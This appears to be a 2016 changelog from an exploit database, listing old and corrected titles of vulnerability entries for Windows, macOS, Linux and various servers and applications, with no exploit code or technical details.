DB: 2016-11-17
3 new exploits
Redhat 6.1 / 6.2 - TTY Flood Users Exploit
RedHat 6.1 / 6.2 - TTY Flood Users Exploit
Microsoft Windows - Kernel ANI File Parsing Crash
Microsoft Windows Kernel - '.ANI' File Parsing Crash
PunBB 2.0.10 - (Register Multiple Users) Denial Of Service
PunBB 2.0.10 - (Register Multiple Users) Denial of Service
Apple Mac OSX 10.4.x - Kernel shared_region_map_file_np() Memory Corruption
Apple Mac OSX 10.4.x Kernel - shared_region_map_file_np() Memory Corruption
MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial Of Service
MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial of Service
MailEnable Professional/Enterprise 2.37 - Denial Of Service
MailEnable Professional/Enterprise 2.37 - Denial of Service
Apple Mac OSX 10.4.x - Kernel i386_set_ldt() Integer Overflow (PoC)
Apple Mac OSX 10.4.x Kernel - i386_set_ldt() Integer Overflow (PoC)
Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial Of Service
Galaxy FTP Server 1.0 - (Neostrada Livebox DSL Router) Denial of Service
MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Command Denial Of Service
MailEnable 3.13 SMTP Service - 'VRFY/EXPN' Command Denial of Service
snircd 1.3.4 - (send_user_mode) Denial of Service
MPlayer - sdpplin_parse() Array Indexing Buffer Overflow (PoC)
Snircd 1.3.4 - 'send_user_mode' Denial of Service
MPlayer 1.0 rc2 - 'sdpplin_parse()' Array Indexing Buffer Overflow (PoC)
LogMeIn Remote Access Utility - ActiveX Memory Corruption (Denial Of Service)
LogMeIn Remote Access Utility - ActiveX Memory Corruption (Denial of Service)
ZoIPer 2.22 - Call-Info Remote Denial Of Service
ZoIPer 2.22 - Call-Info Remote Denial of Service
Dualis 20.4 - '.bin' Local Denial Of Service
Dualis 20.4 - '.bin' Local Denial of Service
Dolphin 2.0 - '.elf' Local Denial Of Service
Dolphin 2.0 - '.elf' Local Denial of Service
Home FTP Server r1.10.3 (build 144) - Denial of Service
Home FTP Server 1.10.3 (build 144) - Denial of Service
Red Hat Linux - stickiness of /tmp Exploit
RedHat Linux - Stickiness of /tmp Exploit
Apple Mac OSX < 10.6.7 - Kernel Panic Exploit
Apple Mac OSX < 10.6.7 - Kernel Panic
Red Hat TUX 2.1.0-2 - HTTP Server Oversized Host Denial of Service
RedHat TUX 2.1.0-2 - HTTP Server Oversized Host Denial of Service
Titan FTP Server 3.0 - 'LIST' Command Denial Of Service
Titan FTP Server 3.0 - 'LIST' Command Denial of Service
Mozilla0.x / Netscape 3/4 / Firefox 1.0 - JavaScript IFRAME Rendering Denial Of Service
Mozilla0.x / Netscape 3/4 / Firefox 1.0 - JavaScript IFRAME Rendering Denial of Service
I Hear U 0.5.6 - Multiple Remote Denial Of Service Vulnerabilities
I Hear U 0.5.6 - Multiple Remote Denial of Service Vulnerabilities
Microsoft Windows Explorer - '.png' Image Local Denial Of Service
Microsoft Windows Explorer - '.png' Image Local Denial of Service
Mozilla FireFox 2.0.8 - Sidebar Bookmark Persistent Denial Of Service
Mozilla FireFox 2.0.8 - Sidebar Bookmark Persistent Denial of Service
MySQL 5.1.23 - Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial Of Service
MySQL 5.1.23 - Server InnoDB CONVERT_SEARCH_MODE_TO_INNOBASE Function Denial of Service
PHP 5.2.5 - Multiple GetText functions Denial Of Service Vulnerabilities
PHP 5.2.5 - Multiple GetText functions Denial of Service Vulnerabilities
LIVE555 Media Server 2007.11.1 - ParseRTSPRequestString Remote Denial Of Service
LIVE555 Media Server 2007.11.1 - ParseRTSPRequestString Remote Denial of Service
Pragma Systems FortressSSH 5.0 - 'msvcrt.dll' Exception Handling Remote Denial Of Service
Pragma Systems FortressSSH 5.0 - 'msvcrt.dll' Exception Handling Remote Denial of Service
Sami FTP Server 2.0.x - Multiple Commands Remote Denial Of Service Vulnerabilities
Sami FTP Server 2.0.x - Multiple Commands Remote Denial of Service Vulnerabilities
SurgeFTP 2.3a2 - 'Content-Length' Parameter Null Pointer Denial Of Service
SurgeFTP 2.3a2 - 'Content-Length' Parameter Null Pointer Denial of Service
RemotelyAnywhere 8.0.668 - 'Accept-Charset' Parameter Null Pointer Denial Of Service
RemotelyAnywhere 8.0.668 - 'Accept-Charset' Parameter Null Pointer Denial of Service
MySQL 5.1.13 - INFORMATION_SCHEMA Remote Denial Of Service
snircd 1.3.4 And ircu 2.10.12.12 - 'set_user_mode' Remote Denial of Service
MySQL 5.1.13 - INFORMATION_SCHEMA Remote Denial of Service
SLMail Pro 6.3.1.0 - Multiple Remote Denial Of Service / Memory Corruption Vulnerabilities
Microsoft Windows XP/Vista/2000/2003/2008 - Kernel Usermode Callback Privilege Escalation (1)
SLMail Pro 6.3.1.0 - Multiple Remote Denial of Service / Memory Corruption Vulnerabilities
Microsoft Windows XP/Vista/2000/2003/2008 Kernel - Usermode Callback Privilege Escalation (1)
SmarterTools SmarterMail 5.0 - HTTP Request Handling Denial Of Service
SmarterTools SmarterMail 5.0 - HTTP Request Handling Denial of Service
Apple iCal 3.0.1 - 'ATTACH' Parameter Denial Of Service
Apple iCal 3.0.1 - 'ATTACH' Parameter Denial of Service
WinWebMail 3.7.3 - IMAP Login Data Handling Denial Of Service
WinWebMail 3.7.3 - IMAP Login Data Handling Denial of Service
Computer Associates ARCserve Backup Discovery Service Remote - Denial Of Service
Computer Associates ARCserve Backup Discovery Service Remote - Denial of Service
Microsoft Excel 2007 - JavaScript Code Remote Denial Of Service
Microsoft Excel 2007 - JavaScript Code Remote Denial of Service
GNOME Rhythmbox 0.11.5 - Malformed Playlist File Denial Of Service
GNOME Rhythmbox 0.11.5 - Malformed Playlist File Denial of Service
GNOME Evolution 2.22.2 - 'html_engine_get_view_width()' Denial Of Service
GNOME Evolution 2.22.2 - 'html_engine_get_view_width()' Denial of Service
SWAT 4 - Multiple Denial Of Service Vulnerabilities
SWAT 4 - Multiple Denial of Service Vulnerabilities
Unreal Tournament 3 - Denial Of Service / Memory Corruption
Unreal Tournament 3 - Denial of Service / Memory Corruption
Combat Evolved 1.0.7.0615 - Multiple Denial Of Service Vulnerabilities
Combat Evolved 1.0.7.0615 - Multiple Denial of Service Vulnerabilities
Noticeware Email Server 4.6 - NG LOGIN Messages Denial Of Service
Noticeware Email Server 4.6 - NG LOGIN Messages Denial of Service
Ruby 1.9 - REXML Remote Denial Of Service
Ruby 1.9 - REXML Remote Denial of Service
Red Hat 8/9 - Directory Server Crafted Search Pattern Denial of Service
RedHat 8/9 - Directory Server Crafted Search Pattern Denial of Service
MySQL 6.0.4 - Empty Binary String Literal Remote Denial Of Service
MySQL 6.0.4 - Empty Binary String Literal Remote Denial of Service
Mass Downloader - Malformed Executable Denial Of Service
Mass Downloader - Malformed Executable Denial of Service
Microsoft Windows 2003/Vista - 'UnhookWindowsHookEx' Local Denial Of Service
Zope 2.11.2 - PythonScript Multiple Remote Denial Of Service Vulnerabilities
Microsoft Windows 2003/Vista - 'UnhookWindowsHookEx' Local Denial of Service
Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities
GeSHi 1.0.x - XML Parsing Remote Denial Of Service
GeSHi 1.0.x - XML Parsing Remote Denial of Service
Symbian S60 - Malformed SMS/Mms Remote Denial Of Service
Symbian S60 - Malformed SMS/Mms Remote Denial of Service
InfraRecorder 0.53 - Memory Corruption (Denial Of Service)
IBM Websphere DataPower XML Security Gateway 3.6.1 XS40 - Remote Denial Of Service
InfraRecorder 0.53 - Memory Corruption (Denial of Service)
IBM Websphere DataPower XML Security Gateway 3.6.1 XS40 - Remote Denial of Service
QNX RTOS 6.4 - Malformed ELF Binary File Local Denial Of Service
QNX RTOS 6.4 - Malformed ELF Binary File Local Denial of Service
Apple Safari For Windows 3.2.1 - Malformed URI Remote Denial Of Service
PHP 5.2.5 - 'mbstring.func_overload' WebServer Denial Of Service
Apple Safari For Windows 3.2.1 - Malformed URI Remote Denial of Service
PHP 5.2.5 - 'mbstring.func_overload' WebServer Denial of Service
Apple Safari 4 - Malformed 'feeds:' URI Null Pointer Dereference Remote Denial Of Service
Apple Safari 4 - Malformed 'feeds:' URI Null Pointer Dereference Remote Denial of Service
MySQL 6.0.9 - XPath Expression Remote Denial Of Service
MySQL 6.0.9 - XPath Expression Remote Denial of Service
MPlayer - Malformed AAC File Handling Denial of Service
MPlayer - Malformed OGM File Handling Denial of Service
MPlayer - '.AAC' File Handling Denial of Service
MPlayer - '.OGM' File Handling Denial of Service
Mani's Admin Plugin - Remote Denial Of Service
Mani's Admin Plugin - Remote Denial of Service
cFos Personal Net 3.09 - Remote Heap Memory Corruption (Denial Of Service)
CUPS 1.3.9 - 'cups/ipp.c' Null Pointer Dereference Denial Of Service
cFos Personal Net 3.09 - Remote Heap Memory Corruption (Denial of Service)
CUPS 1.3.9 - 'cups/ipp.c' Null Pointer Dereference Denial of Service
Git 1.6.3 - Parameter Processing Remote Denial Of Service
Git 1.6.3 - Parameter Processing Remote Denial of Service
GUPnP 0.12.7 - Message Handling Denial Of Service
GUPnP 0.12.7 - Message Handling Denial of Service
ntop 3.3.10 - HTTP Basic Authentication Null Pointer Dereference Denial Of Service
ntop 3.3.10 - HTTP Basic Authentication Null Pointer Dereference Denial of Service
FileCOPA FTP Server 5.01 - 'NOOP' Command Denial Of Service
FileCOPA FTP Server 5.01 - 'NOOP' Command Denial of Service
Snort 2.8.5 - Multiple Denial Of Service Vulnerabilities
Snort 2.8.5 - Multiple Denial of Service Vulnerabilities
lighttpd 1.4/1.5 - Slow Request Handling Remote Denial Of Service
lighttpd 1.4/1.5 - Slow Request Handling Remote Denial of Service
Skybox Security 6.3.x < 6.4.x - Multiple Denial Of Service Issue
Skybox Security 6.3.x < 6.4.x - Multiple Denial of Service Issue
Hybserv2 - ':help' Command Denial Of Service
Hybserv2 - ':help' Command Denial of Service
Mozilla Firefox 3.5.x and SeaMonkey 2.0.1 - Remote Denial Of Service
Apple Safari 4.0.4 - Remote Denial Of Service
Mozilla Firefox 3.5.x and SeaMonkey 2.0.1 - Remote Denial of Service
Apple Safari 4.0.4 - Remote Denial of Service
FreeBSD 8.0 / OpenBSD 4.x - 'ftpd' Null Pointer Dereference Denial Of Service
FreeBSD 8.0 / OpenBSD 4.x - 'ftpd' Null Pointer Dereference Denial of Service
PostgreSQL 8.4.1 - JOIN Hashtable Size Integer Overflow Denial Of Service
PostgreSQL 8.4.1 - JOIN Hashtable Size Integer Overflow Denial of Service
Remote Help HTTP 0.0.7 - GET Request Format String Denial Of Service
Remote Help HTTP 0.0.7 - GET Request Format String Denial of Service
netKar PRO 1.1 - '.nkuser' File Creation Null Pointer Denial Of Service
netKar PRO 1.1 - '.nkuser' File Creation Null Pointer Denial of Service
Geo++ GNCASTER 1.4.0.7 - HTTP GET Request Denial Of Service
Geo++ GNCASTER 1.4.0.7 NMEA-data - Denial Of Service
Xitami 5.0 - '/AUX' Request Remote Denial Of Service
Geo++ GNCASTER 1.4.0.7 - HTTP GET Request Denial of Service
Geo++ GNCASTER 1.4.0.7 NMEA-data - Denial of Service
Xitami 5.0 - '/AUX' Request Remote Denial of Service
Torque Game Engine - Multiple Denial Of Service Vulnerabilities
Torque Game Engine - Multiple Denial of Service Vulnerabilities
EA Battlefield 2 1.41 / Battlefield 2142 1.50 - Multiple Denial Of Service Vulnerabilities
EA Battlefield 2 1.41 / Battlefield 2142 1.50 - Multiple Denial of Service Vulnerabilities
Unreal Engine - 'ReceivedRawBunch()' Denial Of Service
Unreal Engine - 'ReceivedRawBunch()' Denial of Service
Chrome Engine 4 - Denial Of Service
Chrome Engine 4 - Denial of Service
Sagem Fast 3304-V1 - Denial Of Service
Sagem Fast 3304-V1 - Denial of Service
Sumatra PDF 1.1 - Denial Of Service
Sumatra PDF 1.1 - Denial of Service
Freeciv 2.2.1 - Multiple Remote Denial Of Service Vulnerabilities
Multiple Tripwire Interactive Games - 'STEAMCLIENTBLOB' Multiple Denial Of Service Vulnerabilities
Freeciv 2.2.1 - Multiple Remote Denial of Service Vulnerabilities
Multiple Tripwire Interactive Games - 'STEAMCLIENTBLOB' Multiple Denial of Service Vulnerabilities
Microsoft DirectX 8/9 DirectPlay - Multiple Denial Of Service Vulnerabilities
Microsoft DirectX 8/9 DirectPlay - Multiple Denial of Service Vulnerabilities
PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial Of Service
PMSoftware Simple Web Server 2.1 - 'From:' Header Processing Remote Denial of Service
Sniper Elite 1.0 - Null Pointer Dereference Denial Of Service
Sniper Elite 1.0 - Null Pointer Dereference Denial of Service
MySQL 5.1.48 - 'Temporary InnoDB' Tables Denial Of Service
MySQL 5.1.48 - 'EXPLAIN' Denial Of Service
OraclMySQL 5.1.48 - 'LOAD DATA INFILE' Denial Of Service
MySQL 5.1.48 - 'Temporary InnoDB' Tables Denial of Service
MySQL 5.1.48 - 'EXPLAIN' Denial of Service
OraclMySQL 5.1.48 - 'LOAD DATA INFILE' Denial of Service
Oracle MySQL 5.1.48 - 'HANDLER' Interface Denial Of Service
Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial Of Service
Oracle MySQL < 5.1.49 - 'DDL' Statements Denial Of Service
Oracle MySQL 5.1.48 - 'HANDLER' Interface Denial of Service
Oracle MySQL < 5.1.49 - Malformed 'BINLOG' Arguments Denial of Service
Oracle MySQL < 5.1.49 - 'DDL' Statements Denial of Service
GNU glibc - 'regcomp()' Stack Exhaustion Denial Of Service
GNU glibc - 'regcomp()' Stack Exhaustion Denial of Service
Mongoose 2.11 - 'Content-Length' HTTP Header Remote Denial Of Service
Mongoose 2.11 - 'Content-Length' HTTP Header Remote Denial of Service
Microsoft Internet Explorer 11 - Denial Of Service
Microsoft Internet Explorer 11 - Denial of Service
Golden FTP Server 4.70 - Malformed Message Denial Of Service
Golden FTP Server 4.70 - Malformed Message Denial of Service
TP-Link TL-WR740N - Denial Of Service
PHP 5.3.5 - 'grapheme_extract()' Null Pointer Dereference Denial Of Service
TP-Link TL-WR740N - Denial of Service
PHP 5.3.5 - 'grapheme_extract()' Null Pointer Dereference Denial of Service
Battlefield 2/2142 - Malformed Packet Null Pointer Dereference Remote Denial Of Service
Battlefield 2/2142 - Malformed Packet Null Pointer Dereference Remote Denial of Service
Wireshark 1.4.3 - NTLMSSP Null Pointer Dereference Denial Of Service
Air Contacts Lite - HTTP Packet Denial Of Service
Wireshark 1.4.3 - NTLMSSP Null Pointer Dereference Denial of Service
Air Contacts Lite - HTTP Packet Denial of Service
TOTVS ERP Microsiga Protheus 8/10 - Memory Corruption (Denial Of Service)
TOTVS ERP Microsiga Protheus 8/10 - Memory Corruption (Denial of Service)
Perl 5.10 - Multiple Null Pointer Dereference Denial Of Service Vulnerabilities
Perl 5.10 - Multiple Null Pointer Dereference Denial of Service Vulnerabilities
Novell eDirectory 8.8 and Netware LDAP-SSL Daemon - Denial Of Service
Novell eDirectory 8.8 and Netware LDAP-SSL Daemon - Denial of Service
Wireshark 1.4.5 - 'bytes_repr_len()' Null Pointer Dereference Denial Of Service
Wireshark 1.4.5 - 'bytes_repr_len()' Null Pointer Dereference Denial of Service
RealityServer Web Services RTMP Server 3.1.1 build 144525.5 - Null Pointer Dereference Denial Of Service
RealityServer Web Services RTMP Server 3.1.1 build 144525.5 - Null Pointer Dereference Denial of Service
PHP < 5.3.7 - Multiple Null Pointer Dereference Denial Of Service Vulnerabilities
PHP < 5.3.7 - Multiple Null Pointer Dereference Denial of Service Vulnerabilities
Polipo 1.0.4.1 - POST/PUT Requests HTTP Header Processing Denial Of Service
Microsoft Host Integration Server 2004-2010 - Remote Denial Of Service
Polipo 1.0.4.1 - POST/PUT Requests HTTP Header Processing Denial of Service
Microsoft Host Integration Server 2004-2010 - Remote Denial of Service
Multiple Vendors - libc 'regcomp()' Stack Exhaustion Denial Of Service
Multiple Vendors - libc 'regcomp()' Stack Exhaustion Denial of Service
Titan FTP Server 8.40 - 'APPE' Command Remote Denial Of Service
Titan FTP Server 8.40 - 'APPE' Command Remote Denial of Service
Apache APR - Hash Collision Denial Of Service
PHP PDORow Object - Remote Denial Of Service
Apache APR - Hash Collision Denial of Service
PHP PDORow Object - Remote Denial of Service
PHP 5.3.8 - Remote Denial Of Service
PHP 5.3.8 - Remote Denial of Service
Mercury MR804 Router - Multiple HTTP Header Fields Denial Of Service Vulnerabilities
Mercury MR804 Router - Multiple HTTP Header Fields Denial of Service Vulnerabilities
Sony Bravia KDL-32CX525 - 'hping' Command Remote Denial Of Service
Sony Bravia KDL-32CX525 - 'hping' Command Remote Denial of Service
Universal Reader 1.16.740.0 - 'uread.exe' Denial Of Service
Universal Reader 1.16.740.0 - 'uread.exe' Denial of Service
Apache Sling - Denial Of Service
Apache Sling - Denial of Service
VideoLAN VLC Media Player 2.0.2 - '.3gp' File Divide-by-Zero Denial Of Service
VideoLAN VLC Media Player 2.0.2 - '.3gp' File Divide-by-Zero Denial of Service
Microsoft Windows - Kernel Bitmap Handling Use-After-Free (MS15-061) (2)
Microsoft Windows - Kernel DeferWindowPos Use-After-Free (MS15-073)
Microsoft Windows - Kernel UserCommitDesktopMemory Use-After-Free (MS15-073)
Microsoft Windows - Kernel Pool Buffer Overflow Drawing Caption Bar (MS15-061)
Microsoft Windows - Kernel HmgAllocateObjectAttr Use-After-Free (MS15-061)
Microsoft Windows - Kernel win32k!vSolidFillRect Buffer Overflow (MS15-061)
Microsoft Windows - Kernel SURFOBJ Null Pointer Dereference (MS15-061)
Microsoft Windows - Kernel Brush Object Use-After-Free (MS15-061)
Microsoft Windows - Kernel WindowStation Use-After-Free (MS15-061)
Microsoft Windows - Kernel Null Pointer Dereference with Window Station and Clipboard (MS15-061)
Microsoft Windows - Kernel Bitmap Handling Use-After-Free (MS15-061) (1)
Microsoft Windows - Kernel FlashWindowEx Memory Corruption (MS15-097)
Microsoft Windows - Kernel bGetRealizedBrush Use-After-Free (MS15-097)
Microsoft Windows - Kernel Use-After-Free with Cursor Object (MS15-097)
Microsoft Windows - Kernel Use-After-Free with Printer Device Contexts (MS15-097)
Microsoft Windows - Kernel NtGdiStretchBlt Pool Buffer Overflows (MS15-097)
Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (2)
Microsoft Windows Kernel - DeferWindowPos Use-After-Free (MS15-073)
Microsoft Windows Kernel - UserCommitDesktopMemory Use-After-Free (MS15-073)
Microsoft Windows Kernel - Pool Buffer Overflow Drawing Caption Bar (MS15-061)
Microsoft Windows Kernel - HmgAllocateObjectAttr Use-After-Free (MS15-061)
Microsoft Windows Kernel - win32k!vSolidFillRect Buffer Overflow (MS15-061)
Microsoft Windows Kernel - SURFOBJ Null Pointer Dereference (MS15-061)
Microsoft Windows Kernel - Brush Object Use-After-Free (MS15-061)
Microsoft Windows Kernel - WindowStation Use-After-Free (MS15-061)
Microsoft Windows Kernel - Null Pointer Dereference with Window Station and Clipboard (MS15-061)
Microsoft Windows Kernel - Bitmap Handling Use-After-Free (MS15-061) (1)
Microsoft Windows Kernel - FlashWindowEx Memory Corruption (MS15-097)
Microsoft Windows Kernel - bGetRealizedBrush Use-After-Free (MS15-097)
Microsoft Windows Kernel - Use-After-Free with Cursor Object (MS15-097)
Microsoft Windows Kernel - Use-After-Free with Printer Device Contexts (MS15-097)
Microsoft Windows Kernel - NtGdiStretchBlt Pool Buffer Overflows (MS15-097)
Microsoft Windows - Kernel NtGdiBitBlt Buffer Overflow (MS15-097)
Microsoft Windows Kernel - NtGdiBitBlt Buffer Overflow (MS15-097)
MySQL / MariaDB - Geometry Query Denial Of Service
MySQL / MariaDB - Geometry Query Denial of Service
Apple Mac OSX - Kernel IOAccelMemoryInfoUserClient Use-After-Free
Apple Mac OSX Kernel - IOAccelMemoryInfoUserClient Use-After-Free
Microsoft Windows - Kernel 'win32k.sys' Malformed TrueType Program TTF Font Processing Pool-Based Buffer Overflow (MS15-115)
Microsoft Windows - Kernel 'win32k.sys' Malformed OS/2 Table TTF Font Processing Pool-Based Buffer Overflow (MS15-115)
Microsoft Windows Kernel - 'win32k.sys' Malformed TrueType Program TTF Font Processing Pool-Based Buffer Overflow (MS15-115)
Microsoft Windows Kernel - 'win32k.sys' Malformed OS/2 Table TTF Font Processing Pool-Based Buffer Overflow (MS15-115)
Blue Coat ProxySG 5.x - and Security Gateway OS Denial Of Service
Blue Coat ProxySG 5.x - and Security Gateway OS Denial of Service
Microsoft Windows - Kernel Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)
Microsoft Windows Kernel - Device Contexts and NtGdiSelectBitmap Use-After-Free (MS15-115)
Apple Mac OSX - Kernel no-more-senders Use-After-Free
Apple Mac OSX Kernel - no-more-senders Use-After-Free
Apple Mac OSX - Kernel IOAccelDisplayPipeUserClient2 Use-After-Free
Apple Mac OSX Kernel - IOAccelDisplayPipeUserClient2 Use-After-Free
TFTPD32 / Tftpd64 - Denial Of Service
TFTPD32 / Tftpd64 - Denial of Service
Apple Mac OSX / iOS - Kernel IOHDIXControllUserClient::clientClose Use-After-Free/Double-Free
Apple Mac OSX / iOS - Kernel iokit Registry Iterator Manipulation Double-Free
Apple Mac OSX / iOS Kernel - IOHDIXControllUserClient::clientClose Use-After-Free/Double-Free
Apple Mac OSX / iOS Kernel - iokit Registry Iterator Manipulation Double-Free
Apple Mac OSX - Kernel Hypervisor Driver Use-After-Free
Apple Mac OSX Kernel - Hypervisor Driver Use-After-Free
Microsoft Windows - Kernel 'ATMFD.dll' OTF Font Processing Pool-Based Buffer Overflow (MS16-026)
Microsoft Windows - Kernel 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)
Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Pool-Based Buffer Overflow (MS16-026)
Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)
Apple Mac OSX - Kernel Code Execution Due to Lack of Bounds Checking in AppleUSBPipe::Abort
Apple Mac OSX Kernel - Code Execution Due to Lack of Bounds Checking in AppleUSBPipe::Abort
Apple Mac OSX - Kernel AppleKeyStore Use-After-Free
Apple Mac OSX - Kernel Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in Nvidia Geforce Driver
Apple Mac OSX - Kernel Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver
Apple Mac OSX Kernel - AppleKeyStore Use-After-Free
Apple Mac OSX Kernel - Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in Nvidia Geforce Driver
Apple Mac OSX Kernel - Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver
Microsoft Windows - Kernel Bitmap Use-After-Free
Microsoft Windows - Kernel NtGdiGetTextExtentExW Out-of-Bounds Memory Read
Microsoft Windows Kernel - Bitmap Use-After-Free
Microsoft Windows Kernel - NtGdiGetTextExtentExW Out-of-Bounds Memory Read
Microsoft Windows - Kernel DrawMenuBarTemp Wild-Write (MS16-039)
Microsoft Windows Kernel - DrawMenuBarTemp Wild-Write (MS16-039)
Microsoft Windows - Kernel 'win32k.sys' TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)
Microsoft Windows Kernel - 'win32k.sys' TTF Processing EBLC / EBSC Tables Pool Corruption (MS16-039)
Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext
Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in nvCommandQueue::GetHandleIndex in GeForce.kext
Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in AppleMuxControl.kext
Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in AppleGraphicsDeviceControl
Apple Mac OSX - Kernel Exploitable NULL Dereference in IOAccelSharedUserClient2::page_off_resource
Apple Mac OSX - Kernel Exploitable NULL Dereference in CoreCaptureResponder Due to Unchecked Return Value
Apple Mac OSX - Kernel Exploitable Null Pointer Dereference in IOAudioEngine
Apple Mac OSX - Kernel OOB Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type
Apple Mac OSX - Kernel Use-After-Free Due to Bad Locking in IOAcceleratorFamily2
Apple Mac OSX / iOS - Kernel UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient
Apple Mac OSX - Kernel Stack Buffer Overflow in GeForce GPU Driver
Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in AppleMuxControl.kext
Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in AppleGraphicsDeviceControl
Apple Mac OSX Kernel - Exploitable NULL Dereference in IOAccelSharedUserClient2::page_off_resource
Apple Mac OSX Kernel - Exploitable NULL Dereference in CoreCaptureResponder Due to Unchecked Return Value
Apple Mac OSX Kernel - Exploitable Null Pointer Dereference in IOAudioEngine
Apple Mac OSX Kernel - OOB Read of Object Pointer Due to Insufficient Checks in Raw Cast to enum Type
Apple Mac OSX Kernel - Use-After-Free Due to Bad Locking in IOAcceleratorFamily2
Apple Mac OSX / iOS Kernel - UAF Racing getProperty on IOHDIXController and testNetBootMethod on IOHDIXControllerUserClient
Apple Mac OSX Kernel - GeForce GPU Driver Stack Buffer Overflow
Microsoft Windows - Kernel 'ATMFD.dll' NamedEscape 0x250C Pool Corruption (MS16-074)
Microsoft Windows Kernel - 'ATMFD.dll' NamedEscape 0x250C Pool Corruption (MS16-074)
Apple OS X - Kernel IOBluetoothFamily.kext Use-After-Free
Apple OS X Kernel - IOBluetoothFamily.kext Use-After-Free
Linux Kernel 2.2.x / 2.4.x (Redhat) - 'ptrace/kmod' Privilege Escalation
Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation
XGalaga 2.0.34 - Local game Exploit (Red Hat 9.0)
xtokkaetama 1.0b - Local Game Exploit (Red Hat 9.0)
XGalaga 2.0.34 (RedHat 9.0) - Local Game Exploit
xtokkaetama 1.0b (RedHat 9.0) - Local Game Exploit
hztty 2.0 - Privilege Escalation (Red Hat 9.0)
hztty 2.0 (RedHat 9.0) - Privilege Escalation
Redhat 6.2 /sbin/restore - Exploit
RedHat 6.2 /sbin/restore - Exploit
Redhat 6.2 Restore and Dump - Local Exploit (Perl)
RedHat 6.2 Restore and Dump - Local Exploit (Perl)
Redhat 6.2 /usr/bin/rcp - SUID Privilege Escalation Exploit
dump 0.4b15 (Redhat 6.2) - Exploit
RedHat 6.2 /usr/bin/rcp - SUID Privilege Escalation Exploit
dump 0.4b15 (RedHat 6.2) - Exploit
Red Hat 6.2 xsoldier 0.96 - Exploit
xsoldier 0.96 (RedHat 6.2) - Exploit
Redhat 6.1 man - Local Exploit (egid 15)
RedHat 6.1 man - Local Exploit (egid 15)
Microsoft Windows 2000 - Kernel APC Data-Free Local Escalation Exploit (MS05-055)
Microsoft Windows 2000 Kernel - APC Data-Free Local Escalation Exploit (MS05-055)
Microsoft Windows - Kernel Privilege Escalation (MS06-049)
Microsoft Windows Kernel - Privilege Escalation (MS06-049)
Linux Kernel 2.6.30 <= 2.6.30.1 / SELinux (RHEL5) - Kernel Privilege Escalation
Linux Kernel 2.6.30 <= 2.6.30.1 / SELinux (RHEL5) - Privilege Escalation
Linux Kernel 2.x (Redhat) - 'sock_sendpage()' Ring0 Privilege Escalation (1)
Linux Kernel 2.x (RedHat) - 'sock_sendpage()' Ring0 Privilege Escalation (1)
(Linux Kernel 2.6.34-rc3) ReiserFS (Redhat / Ubuntu 9.10) - xattr Privilege Escalation
(Linux Kernel 2.6.34-rc3) ReiserFS (RedHat / Ubuntu 9.10) - xattr Privilege Escalation
Linux Kernel 2.6.27 < 2.6.36 (Redhat x86_64) - 'compat' Privilege Escalation
Linux Kernel 2.6.27 < 2.6.36 (RedHat x86_64) - 'compat' Privilege Escalation
Linux Kernel < 2.6.36-rc6 (Redhat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure (PoC)
Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure (PoC)
Linux Kernel 2.6.37 (Redhat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation (1)
Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation (1)
Immunix OS 6.2/7.0 / Redhat 5.2/6.2/7.0 / S.u.S.E 6.x/7.0/7.1 Man -S - Heap Overflow
Immunix OS 6.2/7.0 / RedHat 5.2/6.2/7.0 / S.u.S.E 6.x/7.0/7.1 Man -S - Heap Overflow
Microsoft Windows - Kernel Intel x64 SYSRET (PoC)
Microsoft Windows Kernel - Intel x64 SYSRET (PoC)
Linux Kernel 3.7.6 (Redhat x86/x64) - 'MSR' Driver Privilege Escalation
Linux Kernel 3.7.6 (RedHat x86/x64) - 'MSR' Driver Privilege Escalation
Nginx (Debian-Based Distributions) - 'logrotate' Local Privilege Escalation
Microsoft Windows XP/7 - Kernel 'win32k.sys' Keyboard Layout Privilege Escalation
Microsoft Windows XP/7 Kernel - 'win32k.sys' Keyboard Layout Privilege Escalation
Microsoft Windows - Kernel 'win32k.sys' Privilege Escalation (MS14-058)
Microsoft Windows Kernel - 'win32k.sys' Privilege Escalation (MS14-058)
Apple OS X/iOS - Kernel IOSurface Use-After-Free
Apple OS X/iOS Kernel - IOSurface Use-After-Free
Linux Kernel (Ubuntu / Fedora / Redhat) - 'Overlayfs' Privilege Escalation (Metasploit)
Linux Kernel (Ubuntu / Fedora / RedHat) - 'Overlayfs' Privilege Escalation (Metasploit)
Ruby 1.8.6 - (Webrick Httpd 1.3.1) Directory Traversal
Ruby 1.8.6/1.9 (WEBick Httpd 1.3.1) - Directory Traversal
mg-soft net Inspector 6.5.0.828 - Multiple Vulnerabilities
MG-SOFT Net Inspector 6.5.0.828 - Multiple Vulnerabilities
